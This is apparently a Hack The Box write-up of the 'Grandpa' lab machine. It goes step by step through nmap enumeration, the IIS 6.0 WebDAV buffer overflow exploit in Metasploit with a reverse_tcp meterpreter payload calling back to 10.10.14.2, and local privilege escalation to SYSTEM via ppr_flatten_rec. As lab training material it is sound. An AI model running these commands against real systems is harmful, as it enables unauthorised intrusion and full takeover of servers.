Let’s get started!
This is the initial step in order to scan the open services in the machine.
COMMAND: nmap -sC -sV -O -oA grandpa 10.10.10.14
Enumerating Port 80
1. Browse to http://10.10.10.14
As we can see port 80 with IIS 6.0 running under it.
Let’s find some exploits for IIS we can see that it has a number of exploits. One we will use is this.
Here is a sample exploit for the above mentioned vulnerability.
Let’s use NMAP to check the exploit is vulnerable to this machine.
We need to create the script file inside the nmap scripts directory:
COMMAND: nano iis-buffer-overflow.nse
Run the iis-buffer-overflow NSE script
Now that the script has been created, lets see if the machine is vulnerable to this exploit:
nmap –script iis-buffer-overflow 10.10.10.14
Now that we know the machine is vulnerable, lets now find a working exploit!
Initial Foothold and Priv Esc – Root
ExplodingCan IIS 6.0 WebDAV BoF Exploit
ExplodingCan was an NSA made exploit that exploits WebDAV and IIS 6.0, I found this github page that details how the exploit works with a python script.
I also found out that there is a metasploit exploit for this too, which i had to use as my shells for the python script always failed with netcat and multi/handler.
So to exploit the vulnerability, im going to use the metasploit method:
Find the exploit
Lets use the metasploit search function tro find the correct exploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl set rhosts 10.10.10.14 set payload windows/meterpreter/reverse_tcp set lhost 10.10.14.2 set SESSION 1 set lport 9002 run
we got a shell which has access denied while accessing user flag.
let’s background the current and run another exploit which helps to bypass the permissions!
Local Exploit Suggester
Im going to use the inbuilt metasploit port exploitation module, Local Exploit Suggester to find a route to either Harry or Administrator.
So the machine looks to be possibly vulnerable to a few exploits, but we will concentrate on the bottom exploit: ppr_flatten_rec
set session 1
set lhost 10.10.14.2
set lport 9003
After i run the exploit ,I faced some errors in which the exploit failed to run !
Let’s get into the previous session and migrate the process so we can run the exploit !
So, i’m going to migrate process into davdata.exe.
COMMAND: migrate 2244
Running the exploit again
Now that we have migrated to a new process, lets run the exploit again:
And the exploit works, we get a new meterpreter session as SYSTEM!
If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r